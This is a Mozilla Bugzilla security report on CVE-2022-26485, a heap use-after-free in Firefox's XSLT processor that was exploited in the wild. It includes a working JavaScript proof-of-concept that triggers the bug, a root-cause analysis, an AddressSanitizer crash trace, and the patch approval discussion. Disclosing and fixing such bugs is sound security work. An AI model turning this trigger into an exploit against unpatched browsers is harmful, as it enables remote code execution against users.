Closed Bug 1758062 (CVE-2022-26485) Opened 11 months ago Closed 11 months ago

heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert [exploited in the wild]

Categories

(Core :: XSLT, defect)

defect

Tracking

()

RESOLVED FIXED
99 Branch
Tracking Status
firefox-esr91 97+ fixed
firefox97 + fixed
firefox98 + fixed
firefox99 + fixed

People

(Reporter: m.cooolie, Assigned: peterv, NeedInfo)

References

Details

(Keywords: csectype-uaf, sec-critical, Whiteboard: [adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?][sec-survey])

Attachments

(3 files)

#Summary
heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert[exploited in th wild]

#Type
Render RCE

#NOTE
We have evidence that the following bug is being explot in the wild.

#CREDIT
wang gang&liu jialei&du sihang&huang yi&yang kang of 360 ATA

#MINIPOC

<script>			
var v1 = '<?xml version="1.0" encoding="utf-8" ?><root><e></e></root>';
var v2 = '<?xml version="1.0" encoding="utf-8"?>  <xsl:stylesheet version="1.0"   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"  xmlns:msxsl="urn:schemas-microsoft-com:xslt"   xmlns:exsl="http://exslt.org/common"  exclude-result-prefixes="msxsl">    <xsl:output method="xml" indent="yes"/> <xsl:param name="test00" />  <xsl:template match="/"> <xsl:value-of select="$test00" />  </xsl:template>    </xsl:stylesheet>';

var a1 = new DOMParser();
var a2 = new XSLTProcessor();
var a3 = a1.parseFromString(v2, "text/xml");
var a4 = a1.parseFromString(v1, "text/xml")
cb01 = {
	[Symbol.toPrimitive](hint) {
		console.log('cb01.toPrimitive')
		a2.removeParameter(null, 'test00');
		if (hint == 'string')
			return 'xxxxx';
		return true;
	}
};
a2.importStylesheet(a3);
a2.setParameter(null, 'test00', cb01);
console.log('bef transformToDocument')
a2.transformToDocument(a4);	
</script>				

#RCA

  1. Convert get call by transformToDocument
  2. Convert use JS::ToString to get str value which cause user js get call
  3. in callback attack call removeParameter to free txVariable itself cause uaf
nsresult txVariable::Convert(nsIVariant* aValue, txAExprResult** aResult) {

	JS::Rooted<JS::Value> v(cx, JS::ObjectValue(*jsobj));
	JS::Rooted<JSString*> str(cx, JS::ToString(cx, v));		<<[1]
	NS_ENSURE_TRUE(str, NS_ERROR_FAILURE);

	nsAutoJSString value;
	NS_ENSURE_TRUE(value.init(cx, str), NS_ERROR_FAILURE);

	*aResult = new StringResult(value, nullptr);
	NS_ADDREF(*aResult);
#ASAN
=================================================================
==15704==ERROR: AddressSanitizer: heap-use-after-free on address 0x12233621cfa0 at pc 0x7ffe52dd81c0 bp 0x00cfa93f7820 sp 0x00cfa93f7868
WRITE of size 8 at 0x12233621cfa0 thread T0
    #0 0x7ffe52dd81bf in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361
    #1 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #2 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #3 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #4 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #5 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #6 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #7 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #8 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #9 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #10 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #11 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #12 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #13 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #14 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #15 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #16 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #17 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #18 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #19 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #20 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #21 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #22 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #23 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #24 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #25 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #26 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #27 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #28 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #29 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #30 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #31 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390
    #32 0x7ffe4a006921 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:124:7'>::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:531
    #33 0x7ffe49fde593 in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1173
    #34 0x7ffe49fef6ac in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467
    #35 0x7ffe4b48986d in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #36 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #37 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #38 0x7ffe5354606a in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137
    #39 0x7ffe5372c29b in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:605
    #40 0x7ffe57dc68f4 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:878
    #41 0x7ffe4b39a125 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324
    #42 0x7ffe4b399ef5 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306
    #43 0x7ffe57dc5e15 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:715
    #44 0x7ff685b9208c in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327
    #45 0x7ff685b917ad in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:147
    #46 0x7ff685c8e757 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #47 0x7ffef2fe7033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #48 0x7ffef3ce2650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)

0x12233621cfa0 is located 16 bytes inside of 24-byte region [0x12233621cf90,0x12233621cfa8)
freed by thread T0 here:
    #0 0x7ffebc467cdb in free /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:82
    #1 0x7ffe52ddd54b in txVariable::~txVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:199
    #2 0x7ffe52dd4309 in txMozillaXSLTProcessor::RemoveParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:964
    #3 0x7ffe4f61aaa9 in mozilla::dom::XSLTProcessor_Binding::removeParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:367
    #4 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #5 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #6 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #7 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #8 0x7ffe580b4b13 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:544
    #9 0x7ffe580b772e in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:589
    #10 0x7ffe5841488f in js::ToPrimitiveSlow /builds/worker/checkouts/gecko/js/src/vm/JSObject.cpp:2402
    #11 0x7ffe58778172 in js::ToStringSlow<js::CanGC> /builds/worker/checkouts/gecko/js/src/vm/StringType.cpp:2185
    #12 0x7ffe52dd7593 in txVariable::Convert /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1355
    #13 0x7ffe52ddd5d3 in txVariable::getValue /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:211
    #14 0x7ffe52d97ccf in txExecutionState::getVariable /builds/worker/checkouts/gecko/dom/xslt/xslt/txExecutionState.cpp:215
    #15 0x7ffe52d81c38 in VariableRefExpr::evaluate /builds/worker/checkouts/gecko/dom/xslt/xpath/txVariableRefExpr.cpp:35
    #16 0x7ffe52daf27c in txValueOf::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txInstructions.cpp:747
    #17 0x7ffe52e06791 in txXSLTProcessor::execute /builds/worker/checkouts/gecko/dom/xslt/xslt/txXSLTProcessor.cpp:46
    #18 0x7ffe52dd0402 in txMozillaXSLTProcessor::TransformToDoc /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:654
    #19 0x7ffe52dcfb4c in txMozillaXSLTProcessor::TransformToDocument /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:533
    #20 0x7ffe4f6186cd in mozilla::dom::XSLTProcessor_Binding::transformToDocument /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:208
    #21 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #22 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #23 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #24 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #25 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #26 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #27 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515

previously allocated by thread T0 here:
    #0 0x7ffebc467deb in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffec314134d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffe52dd21d0 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:920
    #3 0x7ffe52dd5ce7 in txMozillaXSLTProcessor::SetParameter /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1210
    #4 0x7ffe4f61948b in mozilla::dom::XSLTProcessor_Binding::setParameter /builds/worker/workspace/obj-build/dom/bindings/XSLTProcessorBinding.cpp:263
    #5 0x7ffe5005d856 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3306
    #6 0x7ffe580b48a7 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:512
    #7 0x7ffe5809d3f2 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3309
    #8 0x7ffe58087d63 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:394
    #9 0x7ffe580ba923 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:767
    #10 0x7ffe580bae89 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:799
    #11 0x7ffe582ada62 in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:515
    #12 0x7ffe582ade9a in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:539
    #13 0x7ffe4d880625 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:296
    #14 0x7ffe530418d7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2180
    #15 0x7ffe5303f8b0 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2048
    #16 0x7ffe530376ee in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1704
    #17 0x7ffe5303313e in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1147
    #18 0x7ffe5301e943 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:858
    #19 0x7ffe5301d9d6 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118
    #20 0x7ffe4c59da53 in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:897
    #21 0x7ffe4c597a46 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:690
    #22 0x7ffe4c5a5257 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:173
    #23 0x7ffe49f9aff6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:140
    #24 0x7ffe49ffe5dd in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:467
    #25 0x7ffe49fb3381 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:770
    #26 0x7ffe49faf8dc in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:606
    #27 0x7ffe49fb02a4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:390

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert
Shadow bytes around the buggy address:
  0x04619cdc39a0: fd fd fa fa fd fd fd fd fa fa 00 00 00 00 fa fa
  0x04619cdc39b0: 00 00 00 00 fa fa fd fd fd fd fa fa 00 00 00 fa
  0x04619cdc39c0: fa fa 00 00 00 fa fa fa 00 00 00 00 fa fa 00 00
  0x04619cdc39d0: 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd fa fa
  0x04619cdc39e0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 fa
=>0x04619cdc39f0: fa fa fd fd[fd]fa fa fa fd fd fd fd fa fa 00 00
  0x04619cdc3a00: 00 00 fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
  0x04619cdc3a10: 00 00 00 00 fa fa 00 00 00 00 fa fa fd fd fd fd
  0x04619cdc3a20: fa fa 00 00 00 00 fa fa 00 00 00 fa fa fa 00 00
  0x04619cdc3a30: 00 00 fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x04619cdc3a40: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==15704==ABORTING
Flags: sec-bounty?

[Tracking Requested - why for this release]:
0-day being exploited in the wild

Group: firefox-core-security → dom-core-security
Component: Security → XSLT
Product: Firefox → Core
Assignee: nobody → peterv
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true

Comment on attachment 9266495 [details]
Bug 1758062 - Convert parameters upfront. r?smaug!

Security Approval Request

  • How easily could an exploit be constructed based on the patch?: I don't think it's very hard to figure out, though not trivial either.
  • Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?: No
  • Which older supported branches are affected by this flaw?: All
  • If not all supported branches, which bug introduced the flaw?: None
  • Do you have backports for the affected branches?: No
  • If not, how different, hard to create, and risky will they be?: Should apply as-is or with minor merging.
  • How likely is this patch to cause regressions; how much testing does it need?: The patch does cause a change in behaviour for parameters added to an XSLT processor, they are now converted at the point where they are added as opposed to when they are used. This behaviour is actually more reliable and this feature is probably not used a lot and even then it would be odd to rely on the old behaviour. So I'm not too worried about regressions.
Attachment #9266495 - Flags: sec-approval?

Comment on attachment 9266495 [details]
Bug 1758062 - Convert parameters upfront. r?smaug!

Approved to land

Attachment #9266495 - Flags: sec-approval? → sec-approval+

Comment on attachment 9266495 [details]
Bug 1758062 - Convert parameters upfront. r?smaug!

Adding branch approvals to go with Tom's sec-approval.

Attachment #9266495 - Flags: approval-mozilla-release+
Attachment #9266495 - Flags: approval-mozilla-esr91+
Attached file advisory.txt

And pushed to Beta for DevEdition 98.0b10.
https://hg.mozilla.org/releases/mozilla-beta/rev/cd1334289183

Summary: heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert[exploited in th wild] → heap-use-after-free txMozillaXSLTProcessor.cpp:1361 in txVariable::Convert [exploited in the wild]
See Also: → CVE-2022-26486

Is there any way QA can verify this?

Keywords: csectype-uaf

(In reply to Tracy Walker [:tracy] from comment #10)

Is there any way QA can verify this?

There's a test case in the "#MINIPOC" section in comment 0. However, it doesn't crash for me when I run it in a normal debug build on OSX. Maybe it could be verified in an AddressSanitizer build at least?

Ok, given that, QA will trust engineering to verify.

Oh, there is actually a Mochitest in the second patch. You could check that it actually passes on the builds, as it isn't being landed.

Flags: needinfo?(twalker)
Alias: CVE-2022-26485

pdehaan was able to verify the fix via the test. thank you.

Flags: needinfo?(twalker)
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?]
Flags: sec-bounty? → sec-bounty+

As part of a security bug pattern analysis, we are requesting your help with a high level analysis of this bug. It is our hope to develop static analysis (or potentially runtime/dynamic analysis) in the future to identify classes of bugs.

Please visit this google form to reply.

Flags: needinfo?(peterv)
Whiteboard: [adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?] → [adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?][sec-survey]
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.